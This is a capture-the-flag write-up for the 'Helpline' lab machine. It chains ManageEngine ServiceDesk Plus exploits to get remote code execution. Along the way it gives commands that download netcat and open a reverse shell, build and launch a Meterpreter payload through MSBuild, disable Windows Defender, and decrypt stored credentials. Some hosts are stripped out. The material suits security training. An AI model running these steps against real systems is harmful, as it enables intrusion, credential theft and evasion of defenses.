Tags: , , , , , , , ,

This post is a write-up for the Helpline box on


Start by enumerating the ports on the machine. Run nmap and document the result:

Nmap on with scripts

Nmap discovers that ports 135, 445, 8080 and 5985 are open. Ports 8080 and 5985 looks interesting.

ManageEngine ServiceDesk on port 8080

Browsing to the website on port 8080, we find ManageEngine Service Desk Plus v9.3. A quick Google search finds quite a few interesting exploits. Since we have some time, let’s start trying each one and see what we can get.

  1. ManageEngine ServiceDesk Plus 9.0 - User Enumeration This exploit can fuzzing “domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=XXXX”, which will give different results (initially an existing domain) if a user exists or not.

Run the following Wfuzz command to get a list of usernames:

wfuzz -c -Z -z file,/usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt ''
Wfuzz usernames

Fire up BurpSuite and verify some usernames:

Two users are verified, unfortunately no domain leak:

  • guest
  • administrator
  1. ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass This exploit can bypass authentication using a valid username and the same username as a password on /mc/ (mobile client). Then you can keep those credentials, and delete /mc/from the URL.

The exploit works great for **guest**, but not for administrator.

Authenticating as guest
  1. Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation This exploit can steal other user’s cookies via Download the exploit, modify host parameter, and remove line 5 (comments about authors) to bypass problems about encoding.
Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation

Run the exploit and note the outputted cookies:

Administrator cookies

Paste the outputted cookies into the web browser’s Cookie Manager, and you should gain administrator privileges on ManageEngine ServiceDesk.

Administrator cookies in browser
Administrator Session

RCE can be obtained by using the functionality available by default in Helpdesk>Custom triggers, which is triggered by Requests > New Incident:

Custom Trigger

Create a new request to trigger the custom trigger:

New Request

Run tcpdump -i tun0 icmp -vvv and receive a valid RCE:

ICMP traffic

Exploiting the RCE

Using the same process, create 2 custom triggers with the following execute commands:

cmd /c curl -o C:\Windows\System32\spool\drivers\color\nc64.exe
cmd /c C:\Windows\System32\spool\drivers\color\nc64.exe 1234 -e powershell.exe

After catching the reverse shell, run the following command to search the system log files:

(get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessName';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={$_.Properties[8].Value }}).commandline
RCE to Reverse Shell

At this point it is a good idea to pop a more persistent Meterpreter shell. I like to use GreatSCT. Clone the repo and then run the following to install and create a payload:

./ -c
cd ..
use Bypass
use msbuild/meterpreter/
set LPORT 1235
cp /usr/share/greatsct-output/source/abc1231.xml ~/abc1231.xml

Setup the Meterpreter listener on the attacking machine:

msfconsole -r /usr/share/greatsct-output/handlers/abc1231.rc

Run the following on the victim machine to launch the connection:

curl -o C:\ProgramData\abc1231.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\ProgramData\abc1231.xml

Getting User

After catching the Meterpreter shell, we know that user.txt is encrypted, so use the following commands to drop into powershell and decrypt the file:

meterpreter> shell
PS C:\ProgramData> $user = 'HELPLINE\tolu'; $pw='!zaq1234567890pl!99'; $secpw=ConvertTo-SecureString $pw -AsPlainText -Force; $cred= New-Object System.Management.Automation.PSCredential $user,$secpw; Invoke-Command -ComputerName HELPLINE -Credential $cred -Authentication credssp -ScriptBlock {type C:\users\tolu\desktop\user.txt}

Getting Root

In the same Meterpreter shell, run the following to disable Windows Defender:

Set-MpPreference -DisableRealtimeMonitoring $true

Run each line one a time to decrypt the admin-pass.xml file in a similar way to the user.txt process:

$User = "Helpline\Administrator"
$File = "admin-pass.xml"
$MyCredential=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User, (Get-Content $File | ConvertTo-SecureString)
Invoke-Command -ComputerName HELPLINE -Credential $MyCredential -Authentication credssp -ScriptBlock {whoami}
Invoke-Command -ComputerName HELPLINE -Credential $MyCredential -Authentication credssp -ScriptBlock {type C:\Users\Administrator\Desktop\root.txt}